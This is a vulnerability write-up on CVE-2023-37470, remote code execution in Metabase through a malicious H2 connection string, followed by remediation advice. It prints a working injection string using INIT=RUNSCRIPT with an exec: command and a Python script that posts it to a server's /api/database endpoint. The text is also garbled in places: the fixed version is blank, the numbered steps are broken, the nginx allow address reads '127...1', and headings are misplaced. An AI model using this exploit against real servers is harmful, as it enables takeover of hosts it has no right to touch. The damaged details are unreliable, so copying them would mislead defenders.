CVE-2023-37470 - Remote Code Execution in Metabase via H2 Connection String Injection

Metabase is a widely used open-source business intelligence (BI) and analytics platform, popular for helping users visualize and analyze their data with ease. In mid-2023, a serious vulnerability surfaced—CVE-2023-37470—resulting in a potentially devastating Remote Code Execution (RCE) threat for Metabase installations. This write-up explains the vulnerability in plain language, shares code and exploit details, and guides you through effective remediation steps.

What is the Problem?

CVE-2023-37470 stems from unsafe handling of database connection strings when Metabase connects to certain data warehouses, specifically the embedded in-memory H2 Database. When admins or users add a new database to Metabase (or through setup), they provide a connection string. Unfortunately, H2’s connection string parser allows you to embed Java code, which the underlying database engine executes.

Metabase provided a REST API endpoint to validate the connection string before officially saving the new database configuration—which didn’t properly sanitize user input. Malicious actors could exploit this to run arbitrary code on the machine hosting Metabase.

Affected Versions

At risk:
Metabase versions before:

1.46.6.4

Fixed in:

How Does the Exploit Work?

The attacker sends a specially crafted connection string for the H2 database, using a *Java code execution* feature embedded in H2 itself. This connection string is sent to an API endpoint such as /api/database or /api/setup/validate—where Metabase attempts to connect using the provided string, thereby executing the code.

Attacker crafts a malicious H2 connection string (see below).

2. Attacker sends a POST request to /api/database or /api/setup/validate with this connection string.

Metabase, without proper sanitization, says “Let’s test this connection!” and runs the string.

4. The malicious code in the connection string is executed with the privileges of the Metabase process.

1. Malicious H2 Connection String

The H2 connection string supports the INIT parameter, which allows running Java code or importing scripts. Here’s an example using Linux’s touch command to create a file (/tmp/pwned.txt) to show code execution, but attackers could use any command.

jdbc:h2:mem:testdb;INIT=RUNSCRIPT FROM 'exec:touch /tmp/pwned.txt'

2. Example Exploit Python Code

Here’s a simple Python script to exploit an *unpatched* Metabase server by sending the malicious H2 connection string to the POST /api/database endpoint:

import requests

url = 'http://metabase.example.com/api/database';
headers = {
    'Content-Type': 'application/json',
    # Add Authorization header if the API requires authentication
}

data = {
    "name": "malicious-db",
    "engine": "h2",
    "details": {
        "db": "jdbc:h2:mem:testdb;INIT=RUNSCRIPT FROM 'exec:touch /tmp/pwned.txt'"
    },
    "is_full_sync": False, 
    "is_on_demand": False,
    "options": None,
    "auto_run_queries": True
}

response = requests.post(url, json=data, headers=headers)

print("Status:", response.status_code)
print("Body:", response.text)

If the attack succeeds, /tmp/pwned.txt will be created on the server running Metabase.

Exploitation Demo Reference

- Public Metabase advisory
- H2 Database Documentation - SQL Grammar: RUNSCRIPT
- NIST NVD Entry

- Network-level protection: Block these endpoints to all users except trusted admins

- POST /api/database
- PUT /api/database/:id
- POST /api/setup/validate

`nginx

location ~ ^/api/(database|setup/validate) {
allow 127...1; # Only allow localhost/admins

deny all;

}
`

- Audit existing connections: Remove any suspicious databases using H2, and check for unknown files or processes on your Metabase host.

---

## Summary

CVE-2023-37470 in Metabase is a classic example of “dangerous defaults”—a powerful connection string feature in H2, left unchecked, opened the door to system takeover via simple HTTP requests. This bug impacted all unpatched Metabase servers, until core changes disabled H2 as a user-configurable backend.

### Upgrade now, monitor endpoints, and beware of exotic connection string tricks in any web app handling database setup.

---

#### References & Further Reading

- Metabase Security Advisory
- Official Metabase Changelog
- H2 Database Documentation
- NIST CVE-2023-37470

---

*Keep your software current, and never underestimate the risk in connection strings!*

Timeline

Published on: 08/04/2023 16:15:00 UTC
Last modified on: 08/09/2023 20:57:00 UTC